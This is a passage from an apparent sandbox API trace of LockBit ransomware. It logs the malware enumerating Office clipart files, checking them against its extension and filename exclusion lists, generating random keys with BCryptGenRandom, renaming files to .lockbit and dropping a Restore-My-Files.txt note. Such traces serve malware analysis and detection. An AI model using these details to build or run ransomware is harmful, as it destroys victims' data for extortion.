lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.479] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.479] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.480] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.485] free (_Block=0x1fa2ed8) [0160.485] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.485] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.485] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x18ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382961.JPG", cAlternateFileName="")) returned 1 [0160.485] lstrcmpiW (lpString1=".", lpString2="J0382961.JPG") returned -1 [0160.485] lstrcmpiW (lpString1="..", lpString2="J0382961.JPG") returned -1 [0160.485] PathFindExtensionW (pszPath="J0382961.JPG") returned=".JPG" [0160.485] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.485] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.485] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.485] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.485] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.485] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.486] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.486] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382961.JPG") returned 1 [0160.487] lstrcmpiW (lpString1="ntldr", lpString2="J0382961.JPG") returned 1 [0160.487] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382961.JPG") returned 1 [0160.487] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382961.JPG") returned -1 [0160.487] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382961.JPG") returned -1 [0160.487] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382961.JPG") returned 1 [0160.487] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382961.JPG") returned -1 [0160.487] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.487] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG") returned=".JPG" [0160.487] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.487] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.487] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.488] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.488] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.488] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG.lockbit") returned 72 [0160.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382961.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.489] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.489] malloc (_Size=0x40068) returned 0x3df0008 [0160.489] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=101060) returned 1 [0160.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.491] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.708] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.708] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.708] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.745] free (_Block=0x1fa2ed8) [0160.745] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.745] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.745] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1bef7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382962.JPG", cAlternateFileName="")) returned 1 [0160.745] lstrcmpiW (lpString1=".", lpString2="J0382962.JPG") returned -1 [0160.745] lstrcmpiW (lpString1="..", lpString2="J0382962.JPG") returned -1 [0160.745] PathFindExtensionW (pszPath="J0382962.JPG") returned=".JPG" [0160.745] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.745] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.745] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.745] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.745] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.745] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.746] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.746] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.747] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.747] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.747] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.747] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382962.JPG") returned 1 [0160.747] lstrcmpiW (lpString1="ntldr", lpString2="J0382962.JPG") returned 1 [0160.747] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382962.JPG") returned 1 [0160.747] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382962.JPG") returned -1 [0160.747] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382962.JPG") returned -1 [0160.747] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382962.JPG") returned 1 [0160.747] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382962.JPG") returned -1 [0160.747] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.747] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG") returned=".JPG" [0160.747] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.747] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.747] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.747] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.748] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.748] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.748] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG.lockbit") returned 72 [0160.748] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382962.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.749] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.750] malloc (_Size=0x40068) returned 0x3df0008 [0160.750] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=114423) returned 1 [0160.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.751] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.756] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.756] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.767] free (_Block=0x1fa2ed8) [0160.767] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.767] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.768] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17dee, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382963.JPG", cAlternateFileName="")) returned 1 [0160.768] lstrcmpiW (lpString1=".", lpString2="J0382963.JPG") returned -1 [0160.768] lstrcmpiW (lpString1="..", lpString2="J0382963.JPG") returned -1 [0160.768] PathFindExtensionW (pszPath="J0382963.JPG") returned=".JPG" [0160.768] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.768] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.768] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.769] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.769] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.770] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.770] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.770] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.770] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.770] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382963.JPG") returned 1 [0160.770] lstrcmpiW (lpString1="ntldr", lpString2="J0382963.JPG") returned 1 [0160.770] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382963.JPG") returned 1 [0160.770] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382963.JPG") returned -1 [0160.770] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382963.JPG") returned -1 [0160.770] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382963.JPG") returned 1 [0160.770] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382963.JPG") returned -1 [0160.770] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 